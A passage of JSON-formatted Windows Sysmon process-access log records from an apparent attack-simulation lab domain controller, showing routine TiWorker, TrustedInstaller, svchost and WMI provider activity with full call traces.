RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.281","SourceProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","SourceProcessId":"3008","SourceThreadId":"3028","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nSourceProcessId: 3008\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","SourceProcessId":"3008","SourceThreadId":"3028","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
